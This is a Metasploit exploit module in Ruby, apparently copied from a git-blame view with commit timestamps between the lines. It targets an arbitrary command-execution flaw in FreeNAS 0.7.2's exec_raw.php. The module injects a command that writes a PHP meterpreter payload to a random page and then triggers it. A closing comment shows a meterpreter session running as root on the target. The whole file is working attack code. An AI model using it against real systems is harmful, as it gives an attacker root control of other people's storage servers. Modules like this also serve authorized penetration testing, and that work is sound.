2010-11-12 23:02:28 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
2012-02-21 01:40:50 +00:00
# web site for more information on licensing and terms of use.
# http://metasploit.com/
2010-11-12 23:02:28 +00:00
##
require 'msf/core'
class Metasploit3 < Msf :: Exploit :: Remote
Rank = GreatRanking
2010-11-12 23:14:46 +00:00
include Msf :: Exploit :: Remote :: HttpClient
2010-11-12 23:02:28 +00:00
2010-11-12 23:14:46 +00:00
def initialize ( info = { } )
super ( update_info ( info ,
2010-11-24 19:35:38 +00:00
'Name' = > 'FreeNAS exec_raw.php Arbitrary Command Execution' ,
2010-11-12 23:14:46 +00:00
'Description' = > %q{
2010-11-12 23:02:28 +00:00
This module exploits an arbitrary command execution flaw
in FreeNAS 0 . 7 . 2 < rev . 5543 . When passing a specially formatted URL
to the exec_raw . php page , an attacker may be able to execute arbitrary
commands .
2010-11-12 23:14:46 +00:00
2010-11-12 23:02:28 +00:00
NOTE : This module works best with php / meterpreter payloads .
2010-11-12 23:14:46 +00:00
} ,
'Author' = > [ 'MC' ] ,
'License' = > MSF_LICENSE ,
'References' = >
[
[ 'URL' , 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ] ,
] ,
2010-11-12 23:02:28 +00:00
'Payload' = >
{
'Space' = > 6144 ,
'DisableNops' = > true ,
'BadChars' = > " ` \" ' %&x " ,
} ,
'Targets' = >
[
[ 'Automatic Target' , { } ]
] ,
2011-09-06 19:58:40 +00:00
'Privileged' = > true ,
2010-11-12 23:14:46 +00:00
'Platform' = > 'php' ,
'Arch' = > ARCH_PHP ,
'DisclosureDate' = > 'Nov 6 2010' ,
2010-11-12 23:02:28 +00:00
'DefaultTarget' = > 0 ) )
2010-11-12 23:14:46 +00:00
end
2010-11-12 23:02:28 +00:00
2010-11-12 23:14:46 +00:00
def exploit
2010-11-12 23:02:28 +00:00
page = rand_text_alpha_upper ( rand ( 5 ) + 1 ) + " .php "
shellcode = payload . encoded
sploit = " echo \" <?php \n #{ shellcode } \n ?> \" > #{ page } "
2010-11-12 23:14:46 +00:00
2010-11-12 23:02:28 +00:00
print_status ( " Sending exploit page ' #{ page } ' " )
2010-11-12 23:14:46 +00:00
res = send_request_raw (
2010-11-12 23:02:28 +00:00
{
2010-11-12 23:14:46 +00:00
'uri' = > " /exec_raw.php?cmd= " + Rex :: Text . uri_encode ( sploit ) ,
} , 10 )
2010-11-12 23:02:28 +00:00
if ( res and res . code == 200 )
print_status ( " Triggering payload... " )
send_request_raw ( { 'uri' = > " / #{ page } " } , 5 )
handler
else
print_error ( " Exploit failed. " )
return
end
2010-11-12 23:14:46 +00:00
end
2010-11-12 23:02:28 +00:00
end
2010-11-12 23:14:46 +00:00
2010-11-12 23:02:28 +00:00
= begin
meterpreter > sysinfo
Computer : freenas . local
OS : FreeBSD freenas . local 7 . 3 - RELEASE - p2 FreeBSD 7 . 3 - RELEASE - p2 #0: Sat Jul 31 12:22:04 CEST 2010 root@dev.freenas.org:/usr/obj/freenas/usr/src/sys/FREENAS-i386 i386
meterpreter > getuid
Server username : root ( 0 )
2010-11-12 23:14:46 +00:00
meterpreter >
2010-11-12 23:02:28 +00:00
= end